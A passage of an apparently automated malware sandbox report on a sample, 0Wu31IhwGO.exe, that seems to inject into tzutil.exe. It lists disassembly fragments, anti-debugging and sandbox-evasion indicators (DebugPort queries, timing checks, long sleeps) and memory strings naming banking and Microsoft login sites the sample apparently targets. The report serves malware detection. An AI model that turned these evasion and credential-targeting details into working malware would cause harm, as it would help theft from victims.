                Source: Binary string: wntdll.pdb source: 0Wu31IhwGO.exe, 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 0_2_0737E05B pushfd ; ret 0_2_0737E061
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 0_2_0737D04A push CC0737CCh; retf 0_2_0737D051
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_004031D0 push eax; ret 4_2_004031D2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_004169E7 push 0F6CFD2Bh; ret 4_2_00416A18
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00423A0A push esp; ret 4_2_00423A0D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00419359 push ds; ret 4_2_0041935B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00418366 pushad ; iretd 4_2_00418367
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00408325 push dword ptr [ebx+5Dh]; ret 4_2_0040830B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00417388 push edi; ret 4_2_0041738D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00419477 push edx; ret 4_2_00419485
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00408403 push 00000074h; iretd 4_2_0040840B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00417411 push eax; ret 4_2_00417414
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00411D6F push ds; iretd 4_2_00411DBD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00411D7B push ds; iretd 4_2_00411DBD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0041758A push ebp; ret 4_2_004175A6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0040D66A push ecx; iretd 4_2_0040D6D9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00414E05 push cs; retf 4_2_00414E14
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0040860D push cs; retf 4_2_0040860E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00413E93 pushfd ; ret 4_2_00413F00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00413EBC pushfd ; ret 4_2_00413F00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0132225F pushad ; ret 4_2_013227F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_013227FA pushad ; ret 4_2_013227F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_013509AD push ecx; mov dword ptr [esp], ecx 4_2_013509B6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0132283D push eax; iretd 4_2_01322858
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02E1225F pushad ; ret 8_2_02E127F9
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02E127FA pushad ; ret 8_2_02E127F9
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02E1283D push eax; iretd 8_2_02E12858
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02E409AD push ecx; mov dword ptr [esp], ecx 8_2_02E409B6
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_02E11368 push eax; iretd 8_2_02E11369
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_026A423E push eax; ret 8_2_026A4241
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_026A62A4 push edx; ret 8_2_026A62B2
                Source: 0Wu31IhwGO.exe Static PE information: section name: .text entropy: 7.7215249828363035
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: 0Wu31IhwGO.exe PID: 7752, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: EA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: 2BE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: 2A10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: 7970000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: 8970000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: 8B20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: 9B20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: A5B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: B5B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Memory allocated: C5B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0139096E rdtsc 4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe TID: 7772 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 1232 Thread sleep time: -52000s >= -30000s
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe TID: 2128 Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 8_2_026AC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_026AC9D0
                Source: UQ63g7r-.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: tasks.office.comVMware20,11696503903o
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: UQ63g7r-.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: UQ63g7r-.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: UQ63g7r-.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: UQ63g7r-.8.dr Binary or memory string: bankofamerica.comVMware20,11696503903x
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: UQ63g7r-.8.dr Binary or memory string: global block list test formVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: UQ63g7r-.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: interactivebrokers.comVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: AMC password management pageVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: tzutil.exe, 00000008.00000002.3282626615.00000000027DD000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3283458873.000000000117F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2626178179.00000222DFBDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: UQ63g7r-.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: UQ63g7r-.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: UQ63g7r-.8.dr Binary or memory string: outlook.office365.comVMware20,11696503903t
                Source: UQ63g7r-.8.dr Binary or memory string: outlook.office.comVMware20,11696503903s
                Source: UQ63g7r-.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: UQ63g7r-.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: UQ63g7r-.8.dr Binary or memory string: dev.azure.comVMware20,11696503903j
                Source: UQ63g7r-.8.dr Binary or memory string: discord.comVMware20,11696503903f
                Source: UQ63g7r-.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\tzutil.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_0139096E rdtsc 4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: 4_2_00417B63 LdrLoadDll,4_2_00417B63
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6500 mov eax, dword ptr fs:[00000030h]4_2_013E6500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E59C mov eax, dword ptr fs:[00000030h]4_2_0138E59C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01384588 mov eax, dword ptr fs:[00000030h]4_2_01384588
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01352582 mov eax, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01352582 mov ecx, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013525E0 mov eax, dword ptr fs:[00000030h]4_2_013525E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013565D0 mov eax, dword ptr fs:[00000030h]4_2_013565D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A430 mov eax, dword ptr fs:[00000030h]4_2_0138A430
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134C427 mov eax, dword ptr fs:[00000030h]4_2_0134C427
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140A456 mov eax, dword ptr fs:[00000030h]4_2_0140A456
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC460 mov ecx, dword ptr fs:[00000030h]4_2_013DC460
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134645D mov eax, dword ptr fs:[00000030h]4_2_0134645D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137245A mov eax, dword ptr fs:[00000030h]4_2_0137245A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013844B0 mov ecx, dword ptr fs:[00000030h]4_2_013844B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DA4B0 mov eax, dword ptr fs:[00000030h]4_2_013DA4B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013564AB mov eax, dword ptr fs:[00000030h]4_2_013564AB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013504E5 mov ecx, dword ptr fs:[00000030h]4_2_013504E5
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140A49A mov eax, dword ptr fs:[00000030h]4_2_0140A49A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138273C mov ecx, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CC730 mov eax, dword ptr fs:[00000030h]4_2_013CC730
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350710 mov eax, dword ptr fs:[00000030h]4_2_01350710
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01380710 mov eax, dword ptr fs:[00000030h]4_2_01380710
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C700 mov eax, dword ptr fs:[00000030h]4_2_0138C700
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358770 mov eax, dword ptr fs:[00000030h]4_2_01358770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE75D mov eax, dword ptr fs:[00000030h]4_2_013DE75D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350750 mov eax, dword ptr fs:[00000030h]4_2_01350750
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D4755 mov eax, dword ptr fs:[00000030h]4_2_013D4755
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
